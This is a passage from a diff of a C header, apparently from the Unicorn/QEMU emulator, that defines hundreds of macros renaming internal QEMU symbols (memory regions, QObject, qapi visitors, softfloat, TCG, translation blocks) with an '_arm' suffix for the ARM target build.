memory_region_resolve_container_arm +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_arm +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_arm +#define memory_region_set_address memory_region_set_address_arm +#define memory_region_set_alias_offset memory_region_set_alias_offset_arm +#define memory_region_set_enabled memory_region_set_enabled_arm +#define memory_region_set_readonly memory_region_set_readonly_arm +#define memory_region_set_skip_dump memory_region_set_skip_dump_arm +#define memory_region_size memory_region_size_arm +#define memory_region_to_address_space memory_region_to_address_space_arm +#define memory_region_transaction_begin memory_region_transaction_begin_arm +#define memory_region_transaction_commit memory_region_transaction_commit_arm +#define memory_region_unref memory_region_unref_arm +#define memory_region_update_container_subregions memory_region_update_container_subregions_arm +#define memory_region_write_accessor memory_region_write_accessor_arm +#define 
memory_region_wrong_endianness memory_region_wrong_endianness_arm +#define memory_try_enable_merging memory_try_enable_merging_arm +#define module_call_init module_call_init_arm +#define module_load module_load_arm +#define mpidr_cp_reginfo mpidr_cp_reginfo_arm +#define mpidr_read mpidr_read_arm +#define msr_mask msr_mask_arm +#define mul128By64To192 mul128By64To192_arm +#define mul128To256 mul128To256_arm +#define mul64To128 mul64To128_arm +#define muldiv64 muldiv64_arm +#define neon_2rm_is_float_op neon_2rm_is_float_op_arm +#define neon_2rm_sizes neon_2rm_sizes_arm +#define neon_3r_sizes neon_3r_sizes_arm +#define neon_get_scalar neon_get_scalar_arm +#define neon_load_reg neon_load_reg_arm +#define neon_load_reg64 neon_load_reg64_arm +#define neon_load_scratch neon_load_scratch_arm +#define neon_ls_element_type neon_ls_element_type_arm +#define neon_reg_offset neon_reg_offset_arm +#define neon_store_reg neon_store_reg_arm +#define neon_store_reg64 neon_store_reg64_arm +#define neon_store_scratch neon_store_scratch_arm +#define new_ldst_label new_ldst_label_arm +#define next_list next_list_arm +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_arm +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_arm +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_arm +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_arm +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_arm +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_arm +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_arm +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_arm +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_arm +#define not_v6_cp_reginfo not_v6_cp_reginfo_arm +#define not_v7_cp_reginfo not_v7_cp_reginfo_arm +#define not_v8_cp_reginfo not_v8_cp_reginfo_arm +#define object_child_foreach object_child_foreach_arm +#define object_class_foreach object_class_foreach_arm +#define 
object_class_foreach_tramp object_class_foreach_tramp_arm +#define object_class_get_list object_class_get_list_arm +#define object_class_get_list_tramp object_class_get_list_tramp_arm +#define object_class_get_parent object_class_get_parent_arm +#define object_deinit object_deinit_arm +#define object_dynamic_cast object_dynamic_cast_arm +#define object_finalize object_finalize_arm +#define object_finalize_child_property object_finalize_child_property_arm +#define object_get_child_property object_get_child_property_arm +#define object_get_link_property object_get_link_property_arm +#define object_get_root object_get_root_arm +#define object_initialize_with_type object_initialize_with_type_arm +#define object_init_with_type object_init_with_type_arm +#define object_instance_init object_instance_init_arm +#define object_new_with_type object_new_with_type_arm +#define object_post_init_with_type object_post_init_with_type_arm +#define object_property_add_alias object_property_add_alias_arm +#define object_property_add_link object_property_add_link_arm +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_arm +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_arm +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_arm +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_arm +#define object_property_allow_set_link object_property_allow_set_link_arm +#define object_property_del object_property_del_arm +#define object_property_del_all object_property_del_all_arm +#define object_property_find object_property_find_arm +#define object_property_get object_property_get_arm +#define object_property_get_bool object_property_get_bool_arm +#define object_property_get_int object_property_get_int_arm +#define object_property_get_link object_property_get_link_arm +#define object_property_get_qobject object_property_get_qobject_arm +#define object_property_get_str object_property_get_str_arm +#define 
object_property_get_type object_property_get_type_arm +#define object_property_is_child object_property_is_child_arm +#define object_property_set object_property_set_arm +#define object_property_set_description object_property_set_description_arm +#define object_property_set_link object_property_set_link_arm +#define object_property_set_qobject object_property_set_qobject_arm +#define object_release_link_property object_release_link_property_arm +#define object_resolve_abs_path object_resolve_abs_path_arm +#define object_resolve_child_property object_resolve_child_property_arm +#define object_resolve_link object_resolve_link_arm +#define object_resolve_link_property object_resolve_link_property_arm +#define object_resolve_partial_path object_resolve_partial_path_arm +#define object_resolve_path object_resolve_path_arm +#define object_resolve_path_component object_resolve_path_component_arm +#define object_resolve_path_type object_resolve_path_type_arm +#define object_set_link_property object_set_link_property_arm +#define object_unparent object_unparent_arm +#define omap_cachemaint_write omap_cachemaint_write_arm +#define omap_cp_reginfo omap_cp_reginfo_arm +#define omap_threadid_write omap_threadid_write_arm +#define omap_ticonfig_write omap_ticonfig_write_arm +#define omap_wfi_write omap_wfi_write_arm +#define op_bits op_bits_arm +#define open_modeflags open_modeflags_arm +#define op_to_mov op_to_mov_arm +#define op_to_movi op_to_movi_arm +#define output_type_enum output_type_enum_arm +#define packFloat128 packFloat128_arm +#define packFloat16 packFloat16_arm +#define packFloat32 packFloat32_arm +#define packFloat64 packFloat64_arm +#define packFloatx80 packFloatx80_arm +#define page_find page_find_arm +#define page_find_alloc page_find_alloc_arm +#define page_flush_tb page_flush_tb_arm +#define page_flush_tb_1 page_flush_tb_1_arm +#define page_init page_init_arm +#define page_size_init page_size_init_arm +#define par par_arm +#define parse_array parse_array_arm 
+#define parse_error parse_error_arm +#define parse_escape parse_escape_arm +#define parse_keyword parse_keyword_arm +#define parse_literal parse_literal_arm +#define parse_object parse_object_arm +#define parse_optional parse_optional_arm +#define parse_option_bool parse_option_bool_arm +#define parse_option_number parse_option_number_arm +#define parse_option_size parse_option_size_arm +#define parse_pair parse_pair_arm +#define parser_context_free parser_context_free_arm +#define parser_context_new parser_context_new_arm +#define parser_context_peek_token parser_context_peek_token_arm +#define parser_context_pop_token parser_context_pop_token_arm +#define parser_context_restore parser_context_restore_arm +#define parser_context_save parser_context_save_arm +#define parse_str parse_str_arm +#define parse_type_bool parse_type_bool_arm +#define parse_type_int parse_type_int_arm +#define parse_type_number parse_type_number_arm +#define parse_type_size parse_type_size_arm +#define parse_type_str parse_type_str_arm +#define parse_value parse_value_arm +#define par_write par_write_arm +#define patch_reloc patch_reloc_arm +#define phys_map_node_alloc phys_map_node_alloc_arm +#define phys_map_node_reserve phys_map_node_reserve_arm +#define phys_mem_alloc phys_mem_alloc_arm +#define phys_mem_set_alloc phys_mem_set_alloc_arm +#define phys_page_compact phys_page_compact_arm +#define phys_page_compact_all phys_page_compact_all_arm +#define phys_page_find phys_page_find_arm +#define phys_page_set phys_page_set_arm +#define phys_page_set_level phys_page_set_level_arm +#define phys_section_add phys_section_add_arm +#define phys_section_destroy phys_section_destroy_arm +#define phys_sections_free phys_sections_free_arm +#define pickNaN pickNaN_arm +#define pickNaNMulAdd pickNaNMulAdd_arm +#define pmccfiltr_write pmccfiltr_write_arm +#define pmccntr_read pmccntr_read_arm +#define pmccntr_sync pmccntr_sync_arm +#define pmccntr_write pmccntr_write_arm +#define pmccntr_write32 
pmccntr_write32_arm +#define pmcntenclr_write pmcntenclr_write_arm +#define pmcntenset_write pmcntenset_write_arm +#define pmcr_write pmcr_write_arm +#define pmintenclr_write pmintenclr_write_arm +#define pmintenset_write pmintenset_write_arm +#define pmovsr_write pmovsr_write_arm +#define pmreg_access pmreg_access_arm +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_arm +#define pmsav5_data_ap_read pmsav5_data_ap_read_arm +#define pmsav5_data_ap_write pmsav5_data_ap_write_arm +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_arm +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_arm +#define pmuserenr_write pmuserenr_write_arm +#define pmxevtyper_write pmxevtyper_write_arm +#define print_type_bool print_type_bool_arm +#define print_type_int print_type_int_arm +#define print_type_number print_type_number_arm +#define print_type_size print_type_size_arm +#define print_type_str print_type_str_arm +#define propagateFloat128NaN propagateFloat128NaN_arm +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_arm +#define propagateFloat32NaN propagateFloat32NaN_arm +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_arm +#define propagateFloat64NaN propagateFloat64NaN_arm +#define propagateFloatx80NaN propagateFloatx80NaN_arm +#define property_get_alias property_get_alias_arm +#define property_get_bool property_get_bool_arm +#define property_get_str property_get_str_arm +#define property_get_uint16_ptr property_get_uint16_ptr_arm +#define property_get_uint32_ptr property_get_uint32_ptr_arm +#define property_get_uint64_ptr property_get_uint64_ptr_arm +#define property_get_uint8_ptr property_get_uint8_ptr_arm +#define property_release_alias property_release_alias_arm +#define property_release_bool property_release_bool_arm +#define property_release_str property_release_str_arm +#define property_resolve_alias property_resolve_alias_arm +#define property_set_alias property_set_alias_arm +#define property_set_bool property_set_bool_arm +#define property_set_str 
property_set_str_arm +#define pstate_read pstate_read_arm +#define pstate_write pstate_write_arm +#define pxa250_initfn pxa250_initfn_arm +#define pxa255_initfn pxa255_initfn_arm +#define pxa260_initfn pxa260_initfn_arm +#define pxa261_initfn pxa261_initfn_arm +#define pxa262_initfn pxa262_initfn_arm +#define pxa270a0_initfn pxa270a0_initfn_arm +#define pxa270a1_initfn pxa270a1_initfn_arm +#define pxa270b0_initfn pxa270b0_initfn_arm +#define pxa270b1_initfn pxa270b1_initfn_arm +#define pxa270c0_initfn pxa270c0_initfn_arm +#define pxa270c5_initfn pxa270c5_initfn_arm +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_arm +#define qapi_dealloc_end_list qapi_dealloc_end_list_arm +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_arm +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_arm +#define qapi_dealloc_next_list qapi_dealloc_next_list_arm +#define qapi_dealloc_pop qapi_dealloc_pop_arm +#define qapi_dealloc_push qapi_dealloc_push_arm +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_arm +#define qapi_dealloc_start_list qapi_dealloc_start_list_arm +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_arm +#define qapi_dealloc_start_union qapi_dealloc_start_union_arm +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_arm +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_arm +#define qapi_dealloc_type_int qapi_dealloc_type_int_arm +#define qapi_dealloc_type_number qapi_dealloc_type_number_arm +#define qapi_dealloc_type_size qapi_dealloc_type_size_arm +#define qapi_dealloc_type_str qapi_dealloc_type_str_arm +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_arm +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_arm +#define qapi_free_boolList qapi_free_boolList_arm +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_arm +#define qapi_free_int16List qapi_free_int16List_arm +#define qapi_free_int32List qapi_free_int32List_arm +#define qapi_free_int64List 
qapi_free_int64List_arm +#define qapi_free_int8List qapi_free_int8List_arm +#define qapi_free_intList qapi_free_intList_arm +#define qapi_free_numberList qapi_free_numberList_arm +#define qapi_free_strList qapi_free_strList_arm +#define qapi_free_uint16List qapi_free_uint16List_arm +#define qapi_free_uint32List qapi_free_uint32List_arm +#define qapi_free_uint64List qapi_free_uint64List_arm +#define qapi_free_uint8List qapi_free_uint8List_arm +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_arm +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_arm +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_arm +#define qbool_destroy_obj qbool_destroy_obj_arm +#define qbool_from_int qbool_from_int_arm +#define qbool_get_int qbool_get_int_arm +#define qbool_type qbool_type_arm +#define qbus_create qbus_create_arm +#define qbus_create_inplace qbus_create_inplace_arm +#define qbus_finalize qbus_finalize_arm +#define qbus_initfn qbus_initfn_arm +#define qbus_realize qbus_realize_arm +#define qdev_create qdev_create_arm +#define qdev_get_type qdev_get_type_arm +#define qdev_register_types qdev_register_types_arm +#define qdev_set_parent_bus qdev_set_parent_bus_arm +#define qdev_try_create qdev_try_create_arm +#define qdict_add_key qdict_add_key_arm +#define qdict_array_split qdict_array_split_arm +#define qdict_clone_shallow qdict_clone_shallow_arm +#define qdict_del qdict_del_arm +#define qdict_destroy_obj qdict_destroy_obj_arm +#define qdict_entry_key qdict_entry_key_arm +#define qdict_entry_value qdict_entry_value_arm +#define qdict_extract_subqdict qdict_extract_subqdict_arm +#define qdict_find qdict_find_arm +#define qdict_first qdict_first_arm +#define qdict_flatten qdict_flatten_arm +#define qdict_flatten_qdict qdict_flatten_qdict_arm +#define qdict_flatten_qlist qdict_flatten_qlist_arm +#define qdict_get qdict_get_arm +#define qdict_get_bool qdict_get_bool_arm +#define qdict_get_double 
qdict_get_double_arm +#define qdict_get_int qdict_get_int_arm +#define qdict_get_obj qdict_get_obj_arm +#define qdict_get_qdict qdict_get_qdict_arm +#define qdict_get_qlist qdict_get_qlist_arm +#define qdict_get_str qdict_get_str_arm +#define qdict_get_try_bool qdict_get_try_bool_arm +#define qdict_get_try_int qdict_get_try_int_arm +#define qdict_get_try_str qdict_get_try_str_arm +#define qdict_haskey qdict_haskey_arm +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_arm +#define qdict_iter qdict_iter_arm +#define qdict_join qdict_join_arm +#define qdict_new qdict_new_arm +#define qdict_next qdict_next_arm +#define qdict_next_entry qdict_next_entry_arm +#define qdict_put_obj qdict_put_obj_arm +#define qdict_size qdict_size_arm +#define qdict_type qdict_type_arm +#define qemu_clock_get_us qemu_clock_get_us_arm +#define qemu_clock_ptr qemu_clock_ptr_arm +#define qemu_clocks qemu_clocks_arm +#define qemu_get_cpu qemu_get_cpu_arm +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_arm +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_arm +#define qemu_get_ram_block qemu_get_ram_block_arm +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_arm +#define qemu_get_ram_fd qemu_get_ram_fd_arm +#define qemu_get_ram_ptr qemu_get_ram_ptr_arm +#define qemu_host_page_mask qemu_host_page_mask_arm +#define qemu_host_page_size qemu_host_page_size_arm +#define qemu_init_vcpu qemu_init_vcpu_arm +#define qemu_ld_helpers qemu_ld_helpers_arm +#define qemu_log_close qemu_log_close_arm +#define qemu_log_enabled qemu_log_enabled_arm +#define qemu_log_flush qemu_log_flush_arm +#define qemu_loglevel_mask qemu_loglevel_mask_arm +#define qemu_log_vprintf qemu_log_vprintf_arm +#define qemu_oom_check qemu_oom_check_arm +#define qemu_parse_fd qemu_parse_fd_arm +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_arm +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_arm +#define qemu_ram_alloc 
qemu_ram_alloc_arm +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_arm +#define qemu_ram_foreach_block qemu_ram_foreach_block_arm +#define qemu_ram_free qemu_ram_free_arm +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_arm +#define qemu_ram_ptr_length qemu_ram_ptr_length_arm +#define qemu_ram_remap qemu_ram_remap_arm +#define qemu_ram_setup_dump qemu_ram_setup_dump_arm +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_arm +#define qemu_real_host_page_size qemu_real_host_page_size_arm +#define qemu_st_helpers qemu_st_helpers_arm +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_arm +#define qemu_try_memalign qemu_try_memalign_arm +#define qentry_destroy qentry_destroy_arm +#define qerror_human qerror_human_arm +#define qerror_report qerror_report_arm +#define qerror_report_err qerror_report_err_arm +#define qfloat_destroy_obj qfloat_destroy_obj_arm +#define qfloat_from_double qfloat_from_double_arm +#define qfloat_get_double qfloat_get_double_arm +#define qfloat_type qfloat_type_arm +#define qint_destroy_obj qint_destroy_obj_arm +#define qint_from_int qint_from_int_arm +#define qint_get_int qint_get_int_arm +#define qint_type qint_type_arm +#define qlist_append_obj qlist_append_obj_arm +#define qlist_copy qlist_copy_arm +#define qlist_copy_elem qlist_copy_elem_arm +#define qlist_destroy_obj qlist_destroy_obj_arm +#define qlist_empty qlist_empty_arm +#define qlist_entry_obj qlist_entry_obj_arm +#define qlist_first qlist_first_arm +#define qlist_iter qlist_iter_arm +#define qlist_new qlist_new_arm +#define qlist_next qlist_next_arm +#define qlist_peek qlist_peek_arm +#define qlist_pop qlist_pop_arm +#define qlist_size qlist_size_arm +#define qlist_size_iter qlist_size_iter_arm +#define qlist_type qlist_type_arm +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_arm +#define qmp_input_end_list qmp_input_end_list_arm +#define qmp_input_end_struct qmp_input_end_struct_arm +#define qmp_input_get_next_type qmp_input_get_next_type_arm 
+#define qmp_input_get_object qmp_input_get_object_arm +#define qmp_input_get_visitor qmp_input_get_visitor_arm +#define qmp_input_next_list qmp_input_next_list_arm +#define qmp_input_optional qmp_input_optional_arm +#define qmp_input_pop qmp_input_pop_arm +#define qmp_input_push qmp_input_push_arm +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_arm +#define qmp_input_start_list qmp_input_start_list_arm +#define qmp_input_start_struct qmp_input_start_struct_arm +#define qmp_input_type_bool qmp_input_type_bool_arm +#define qmp_input_type_int qmp_input_type_int_arm +#define qmp_input_type_number qmp_input_type_number_arm +#define qmp_input_type_str qmp_input_type_str_arm +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_arm +#define qmp_input_visitor_new qmp_input_visitor_new_arm +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_arm +#define qmp_output_add_obj qmp_output_add_obj_arm +#define qmp_output_end_list qmp_output_end_list_arm +#define qmp_output_end_struct qmp_output_end_struct_arm +#define qmp_output_first qmp_output_first_arm +#define qmp_output_get_qobject qmp_output_get_qobject_arm +#define qmp_output_get_visitor qmp_output_get_visitor_arm +#define qmp_output_last qmp_output_last_arm +#define qmp_output_next_list qmp_output_next_list_arm +#define qmp_output_pop qmp_output_pop_arm +#define qmp_output_push_obj qmp_output_push_obj_arm +#define qmp_output_start_list qmp_output_start_list_arm +#define qmp_output_start_struct qmp_output_start_struct_arm +#define qmp_output_type_bool qmp_output_type_bool_arm +#define qmp_output_type_int qmp_output_type_int_arm +#define qmp_output_type_number qmp_output_type_number_arm +#define qmp_output_type_str qmp_output_type_str_arm +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_arm +#define qmp_output_visitor_new qmp_output_visitor_new_arm +#define qobject_decref qobject_decref_arm +#define qobject_to_qbool qobject_to_qbool_arm +#define qobject_to_qdict 
qobject_to_qdict_arm +#define qobject_to_qfloat qobject_to_qfloat_arm +#define qobject_to_qint qobject_to_qint_arm +#define qobject_to_qlist qobject_to_qlist_arm +#define qobject_to_qstring qobject_to_qstring_arm +#define qobject_type qobject_type_arm +#define qstring_append qstring_append_arm +#define qstring_append_chr qstring_append_chr_arm +#define qstring_append_int qstring_append_int_arm +#define qstring_destroy_obj qstring_destroy_obj_arm +#define qstring_from_escaped_str qstring_from_escaped_str_arm +#define qstring_from_str qstring_from_str_arm +#define qstring_from_substr qstring_from_substr_arm +#define qstring_get_length qstring_get_length_arm +#define qstring_get_str qstring_get_str_arm +#define qstring_new qstring_new_arm +#define qstring_type qstring_type_arm +#define ram_block_add ram_block_add_arm +#define ram_size ram_size_arm +#define range_compare range_compare_arm +#define range_covers_byte range_covers_byte_arm +#define range_get_last range_get_last_arm +#define range_merge range_merge_arm +#define ranges_can_merge ranges_can_merge_arm +#define raw_read raw_read_arm +#define raw_write raw_write_arm +#define rcon rcon_arm +#define read_raw_cp_reg read_raw_cp_reg_arm +#define recip_estimate recip_estimate_arm +#define recip_sqrt_estimate recip_sqrt_estimate_arm +#define register_cp_regs_for_features register_cp_regs_for_features_arm +#define register_multipage register_multipage_arm +#define register_subpage register_subpage_arm +#define register_tm_clones register_tm_clones_arm +#define register_types_object register_types_object_arm +#define regnames regnames_arm +#define render_memory_region render_memory_region_arm +#define reset_all_temps reset_all_temps_arm +#define reset_temp reset_temp_arm +#define rol32 rol32_arm +#define rol64 rol64_arm +#define ror32 ror32_arm +#define ror64 ror64_arm +#define roundAndPackFloat128 roundAndPackFloat128_arm +#define roundAndPackFloat16 roundAndPackFloat16_arm +#define roundAndPackFloat32 
roundAndPackFloat32_arm +#define roundAndPackFloat64 roundAndPackFloat64_arm +#define roundAndPackFloatx80 roundAndPackFloatx80_arm +#define roundAndPackInt32 roundAndPackInt32_arm +#define roundAndPackInt64 roundAndPackInt64_arm +#define roundAndPackUint64 roundAndPackUint64_arm +#define round_to_inf round_to_inf_arm +#define run_on_cpu run_on_cpu_arm +#define s0 s0_arm +#define S0 S0_arm +#define s1 s1_arm +#define S1 S1_arm +#define sa1100_initfn sa1100_initfn_arm +#define sa1110_initfn sa1110_initfn_arm +#define save_globals save_globals_arm +#define scr_write scr_write_arm +#define sctlr_write sctlr_write_arm +#define set_bit set_bit_arm +#define set_bits set_bits_arm +#define set_default_nan_mode set_default_nan_mode_arm +#define set_feature set_feature_arm +#define set_float_detect_tininess set_float_detect_tininess_arm +#define set_float_exception_flags set_float_exception_flags_arm +#define set_float_rounding_mode set_float_rounding_mode_arm +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_arm +#define set_flush_to_zero set_flush_to_zero_arm +#define set_swi_errno set_swi_errno_arm +#define sextract32 sextract32_arm +#define sextract64 sextract64_arm +#define shift128ExtraRightJamming shift128ExtraRightJamming_arm +#define shift128Right shift128Right_arm +#define shift128RightJamming shift128RightJamming_arm +#define shift32RightJamming shift32RightJamming_arm +#define shift64ExtraRightJamming shift64ExtraRightJamming_arm +#define shift64RightJamming shift64RightJamming_arm +#define shifter_out_im shifter_out_im_arm +#define shortShift128Left shortShift128Left_arm +#define shortShift192Left shortShift192Left_arm +#define simple_mpu_ap_bits simple_mpu_ap_bits_arm +#define size_code_gen_buffer size_code_gen_buffer_arm +#define softmmu_lock_user softmmu_lock_user_arm +#define softmmu_lock_user_string softmmu_lock_user_string_arm +#define softmmu_tget32 softmmu_tget32_arm +#define softmmu_tget8 softmmu_tget8_arm +#define softmmu_tput32 
softmmu_tput32_arm +#define softmmu_unlock_user softmmu_unlock_user_arm +#define sort_constraints sort_constraints_arm +#define sp_el0_access sp_el0_access_arm +#define spsel_read spsel_read_arm +#define spsel_write spsel_write_arm +#define start_list start_list_arm +#define stb_p stb_p_arm +#define stb_phys stb_phys_arm +#define stl_be_p stl_be_p_arm +#define stl_be_phys stl_be_phys_arm +#define stl_he_p stl_he_p_arm +#define stl_le_p stl_le_p_arm +#define stl_le_phys stl_le_phys_arm +#define stl_phys stl_phys_arm +#define stl_phys_internal stl_phys_internal_arm +#define stl_phys_notdirty stl_phys_notdirty_arm +#define store_cpu_offset store_cpu_offset_arm +#define store_reg store_reg_arm +#define store_reg_bx store_reg_bx_arm +#define store_reg_from_load store_reg_from_load_arm +#define stq_be_p stq_be_p_arm +#define stq_be_phys stq_be_phys_arm +#define stq_he_p stq_he_p_arm +#define stq_le_p stq_le_p_arm +#define stq_le_phys stq_le_phys_arm +#define stq_phys stq_phys_arm +#define string_input_get_visitor string_input_get_visitor_arm +#define string_input_visitor_cleanup string_input_visitor_cleanup_arm +#define string_input_visitor_new string_input_visitor_new_arm +#define strongarm_cp_reginfo strongarm_cp_reginfo_arm +#define strstart strstart_arm +#define strtosz strtosz_arm +#define strtosz_suffix strtosz_suffix_arm +#define stw_be_p stw_be_p_arm +#define stw_be_phys stw_be_phys_arm +#define stw_he_p stw_he_p_arm +#define stw_le_p stw_le_p_arm +#define stw_le_phys stw_le_phys_arm +#define stw_phys stw_phys_arm +#define stw_phys_internal stw_phys_internal_arm +#define sub128 sub128_arm +#define sub16_sat sub16_sat_arm +#define sub16_usat sub16_usat_arm +#define sub192 sub192_arm +#define sub8_sat sub8_sat_arm +#define sub8_usat sub8_usat_arm +#define subFloat128Sigs subFloat128Sigs_arm +#define subFloat32Sigs subFloat32Sigs_arm +#define subFloat64Sigs subFloat64Sigs_arm +#define subFloatx80Sigs subFloatx80Sigs_arm +#define subpage_accepts subpage_accepts_arm 
+#define subpage_init subpage_init_arm +#define subpage_ops subpage_ops_arm +#define subpage_read subpage_read_arm +#define subpage_register subpage_register_arm +#define subpage_write subpage_write_arm +#define suffix_mul suffix_mul_arm +#define swap_commutative swap_commutative_arm +#define swap_commutative2 swap_commutative2_arm +#define switch_mode switch_mode_arm +#define switch_v7m_sp switch_v7m_sp_arm +#define syn_aa32_bkpt syn_aa32_bkpt_arm +#define syn_aa32_hvc syn_aa32_hvc_arm +#define syn_aa32_smc syn_aa32_smc_arm +#define syn_aa32_svc syn_aa32_svc_arm +#define syn_breakpoint syn_breakpoint_arm +#define sync_globals sync_globals_arm +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_arm +#define syn_cp14_rt_trap syn_cp14_rt_trap_arm +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_arm +#define syn_cp15_rt_trap syn_cp15_rt_trap_arm +#define syn_data_abort syn_data_abort_arm +#define syn_fp_access_trap syn_fp_access_trap_arm +#define syn_insn_abort syn_insn_abort_arm +#define syn_swstep syn_swstep_arm +#define syn_uncategorized syn_uncategorized_arm +#define syn_watchpoint syn_watchpoint_arm +#define syscall_err syscall_err_arm +#define system_bus_class_init system_bus_class_init_arm +#define system_bus_info system_bus_info_arm +#define t2ee_cp_reginfo t2ee_cp_reginfo_arm +#define table_logic_cc table_logic_cc_arm +#define target_parse_constraint target_parse_constraint_arm +#define target_words_bigendian target_words_bigendian_arm +#define tb_add_jump tb_add_jump_arm +#define tb_alloc tb_alloc_arm +#define tb_alloc_page tb_alloc_page_arm +#define tb_check_watchpoint tb_check_watchpoint_arm +#define tb_find_fast tb_find_fast_arm +#define tb_find_pc tb_find_pc_arm +#define tb_find_slow tb_find_slow_arm +#define tb_flush tb_flush_arm +#define tb_flush_jmp_cache tb_flush_jmp_cache_arm +#define tb_free tb_free_arm +#define tb_gen_code tb_gen_code_arm +#define tb_hash_remove tb_hash_remove_arm +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_arm +#define 
tb_invalidate_phys_page_range tb_invalidate_phys_page_range_arm +#define tb_invalidate_phys_range tb_invalidate_phys_range_arm +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_arm +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_arm +#define tb_jmp_remove tb_jmp_remove_arm +#define tb_link_page tb_link_page_arm +#define tb_page_remove tb_page_remove_arm +#define tb_phys_hash_func tb_phys_hash_func_arm +#define tb_phys_invalidate tb_phys_invalidate_arm +#define tb_reset_jump tb_reset_jump_arm +#define tb_set_jmp_target tb_set_jmp_target_arm +#define tcg_accel_class_init tcg_accel_class_init_arm +#define tcg_accel_type tcg_accel_type_arm +#define tcg_add_param_i32 tcg_add_param_i32_arm +#define tcg_add_param_i64 tcg_add_param_i64_arm +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_arm +#define tcg_allowed tcg_allowed_arm +#define tcg_canonicalize_memop tcg_canonicalize_memop_arm +#define tcg_commit tcg_commit_arm +#define tcg_cond_to_jcc tcg_cond_to_jcc_arm +#define tcg_constant_folding tcg_constant_folding_arm +#define tcg_const_i32 tcg_const_i32_arm +#define tcg_const_i64 tcg_const_i64_arm +#define tcg_const_local_i32 tcg_const_local_i32_arm +#define tcg_const_local_i64 tcg_const_local_i64_arm +#define tcg_context_init tcg_context_init_arm +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_arm +#define tcg_cpu_exec tcg_cpu_exec_arm +#define tcg_current_code_size tcg_current_code_size_arm +#define tcg_dump_info tcg_dump_info_arm +#define tcg_dump_ops tcg_dump_ops_arm +#define tcg_exec_all tcg_exec_all_arm +#define tcg_find_helper tcg_find_helper_arm +#define tcg_func_start tcg_func_start_arm +#define tcg_gen_abs_i32 tcg_gen_abs_i32_arm +#define tcg_gen_add2_i32 tcg_gen_add2_i32_arm +#define tcg_gen_add_i32 tcg_gen_add_i32_arm +#define tcg_gen_add_i64 tcg_gen_add_i64_arm +#define tcg_gen_addi_i32 tcg_gen_addi_i32_arm +#define tcg_gen_addi_i64 tcg_gen_addi_i64_arm +#define tcg_gen_andc_i32 tcg_gen_andc_i32_arm +#define 
